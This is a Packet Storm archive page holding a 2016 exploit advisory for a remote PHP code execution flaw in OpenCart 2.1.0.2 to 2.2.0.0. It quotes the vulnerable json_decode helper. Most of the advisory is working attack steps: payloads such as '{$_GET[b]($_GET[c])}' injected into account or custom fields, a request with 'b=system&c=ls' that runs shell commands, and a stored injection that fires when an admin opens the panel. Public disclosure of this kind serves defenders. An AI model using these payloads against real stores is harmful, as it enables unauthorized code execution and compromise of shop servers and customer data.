what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

OpenCart 2.2.0.0 Remote PHP Code Execution

OpenCart 2.2.0.0 Remote PHP Code Execution
Posted Apr 11, 2016
Authored by Naser Farhadi

OpenCart version 2.2.0.0 suffers from a remote PHP code execution vulnerability.

tags | exploit, remote, php, code execution
SHA-256 | 1417eaf1f6b4295c475e0cc0fe94f8b4ddfb74538eee3554c3b8bb9362212ef5

OpenCart 2.2.0.0 Remote PHP Code Execution

Change Mirror Download
##
# OpenCart json_decode function Remote PHP Code Execution
#
# Author: Naser Farhadi
# Twitter: @naserfarhadi
#
# Date: 9 April 2016 # Version: 2.1.0.2 to 2.2.0.0 (Latest version)
# Vendor Homepage: http://www.opencart.com/
#
# Vulnerability:
# ------------
# /upload/system/helper/json.php
# $match = '/".*?(?<!\\\\)"/';
# $string = preg_replace($match, '', $json);
# $string = preg_replace('/[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/', '', $string);
# ...
# $function = @create_function('', "return {$json};"); /**** The Root of All Evil ****/
# $return = ($function) ? $function() : null;
# ...
# return $return;
#
# Exploit(json_decode):
# ------------
# var_dump(json_decode('{"ok":"{$_GET[b]($_GET[c])}"}'));
# var_dump(json_decode('{"ok":"$_SERVER[HTTP_USER_AGENT]"}'));
# var_dump(json_decode('{"ok":"1"."2"."3"}'));
#
# Real World Exploit(OpenCart /index.php?route=account/edit)
# ------------
# go to http://host/shop_directory/index.php?route=account/edit
# fill $_SERVER[HTTP_USER_AGENT] as First Name
# /** save it two times **/
# Code execution happens when an admin user visits the administration panel, in this example
# admin user sees his user agent as your First Name in Recent Activity :D
#
# Another example(OpenCart account/edit or account/register custom_field): /** Best Case **/
# ------------
# if admin adds a Custom Field from /admin/index.php?route=customer/custom_field for custom
# user information like extra phone number,... you can directly execute your injected code.
# go to http://host/shop_directory/index.php?route=account/edit
# fill {$_GET[b]($_GET[c])} as Custom Field value
# save it
# go to http://host/shop_directory/index.php?route=account/edit&b=system&c=ls /** Mission Accomplished **/
#
# Note:
# ------------
# Exploit only works if PHP JSON extension is not installed.
#
# Video: https://youtu.be/1Ai09IQK4C0
##
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close